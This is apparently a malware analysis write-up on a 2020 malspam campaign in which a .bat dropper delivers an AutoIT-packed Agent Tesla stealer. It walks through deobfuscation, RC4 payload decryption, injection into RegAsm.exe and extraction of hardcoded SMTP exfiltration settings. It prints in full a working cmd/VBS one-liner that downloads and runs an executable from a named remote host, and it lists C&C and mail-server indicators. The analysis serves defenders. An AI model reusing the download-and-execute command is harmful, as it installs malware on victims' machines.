The 29th of February 2020, thanks to our Malware Intelligence Platform, we found a new, strange, malspam campaign with, as target, the sales office of an important company. The email was the following:
The attachment of this malspam email wasn’t the usual Microsoft Office dropper with macros, but a simple .bat dropper that did nothing but download and run the real AutoIT malware from this domain: hxxp://www.bitsandbytes.net.in/bobbbb.exe
cmd.exe /c “@echo Set objXMLHTTP=CreateObject(“MSXML2.XMLHTTP”)>%TEMP%poc.vbs&@echo objXMLHTTP.open “GET”,”http://www.bitsandbytes.net.in/bobbbb.exe”,false»%TEMP%poc.vbs&@echo objXMLHTTP.send()»%TEMP%poc.vbs&@echo If objXMLHTTP.Status=200 Then»%TEMP%poc.vbs&@echo Set objADOStream=CreateObject(“ADODB.Stream”)»%TEMP%poc.vbs&@echo objADOStream.Open»%TEMP%poc.vbs&@echo objADOStream.Type=1 »%TEMP%poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody»%TEMP%poc.vbs&@echo objADOStream.Position=0 »%TEMP%poc.vbs&@echo objADOStream.SaveToFile “%TEMP%\LDTVF.exe”»%TEMP%poc.vbs&@echo objADOStream.Close»%TEMP%poc.vbs&@echo Set objADOStream=Nothing»%TEMP%poc.vbs&@echo End if»%TEMP%poc.vbs&@echo Set objXMLHTTP=Nothing»%TEMP%poc.vbs&@echo Set objShell=CreateObject(“WScript.Shell”)»%TEMP%poc.vbs&@echo objShell.Exec(“%TEMP%\LDTVF.exe”)»%TEMP%poc.vbs&cscript.exe %TEMP%poc.vbs”
The downloaded bobbbb.exe is an AutoIT executable that contains an Agent Tesla payload.
AutoIT is a scripting language for Windows, really used to create malware because of his high-level abstraction and his low rate of antivirus detection. Fortunately, it’s compilation process is easy to invert, with tools like Exe2Aut, that returns an almost perfect AutoIT source code. However, the code is, really often, highly obfuscated, then difficult to understand.
As you can see in figure 3, all strings are encrypted by one or more levels of obfuscation. Fortunately all those decryption functions return a string, and since we can modify the source code, I modified those functions directly in the program to write to a file the result of the decryption. After that, with a simple python script a subsituted in the source code the decrypted strings to obtain something more readable.
In Figure 2 you can see the main function of this executable:
The $payload variable contains the shellcode of Agent Tesla malware as reversed string ( it ends with “x0” ). This payload is decrypted and injected in the RegAsm.exe process.
Next I will explain the details of this process.
To extract the payload of Agent Tesla, we have to analyze in detail what the program does with the $payload variable. In Figure 3-4, you can see the AllocatePayload () function before and after the deobfuscation:
In this function we can see another shellcode that I called $rc4decryptor. Indeed it’s clear what the dropper does:
FileWrite (“decrypted_payload.bin”, $decrypted_payload)
Otherwise we can put a breakpoint to the end of the RC4 decryption stub, and dump the decrypted memory (but after that you need to rebuild the corrupted PE Header).
The InjectToProcess() function (Figure 5) allocates memory for another strange shellcode, built, again, concatenating strings. Then calls that shellcode with RegAsm.exe and the decrypted payload of Agent Tesla as parameters. That shellcode simply injects the payload in the process.
Agent Tesla is a .Net based malware that steals passwords, keystrokes and other sensible information, then sends it to a remote c&c server, through HTTP/SMTP protocols. I will not go deep in this analysis, because a lot of articles have already analyzed this kind of malware. Through a dynamic analysis, we can easily see that it try to access to all browser’s files that stores passwords (Figure 6), and opens a TCP connection with this AWS c&c:
ec2-54-204-24-179.compute-1.amazonaws[.]com
Analyzing the extracted payload with dnSPY, we can see another obfuscated code. What we want to retrieve are the SMTP credentials, that are hardcoded in the extracted payload (figure below). All strings are decrypted by Module.\u205f () function.
In this function (last figure) the parameter A_0 is an integer that identify the string to decrypt. It is used only at line 18055, then I decided to put a breakpoint at line 18056 and modify manually the value of num3 variable in memory, setting the indexes corresponding to the SMTP credentials (this process, because unfortunately during debugging, I can’t reach the SMTP stub….).
Username index: 602112 -> 0x00093000 -> contact@euramtec.pw
Password index: 602240 -> 0x00093080 -> ***
SMTP host index: 602368 -> 0x00093100 -> “us2.smtp.mailhostbox.com”
Then, this is how the emails with stolen data arrive to the malware owner: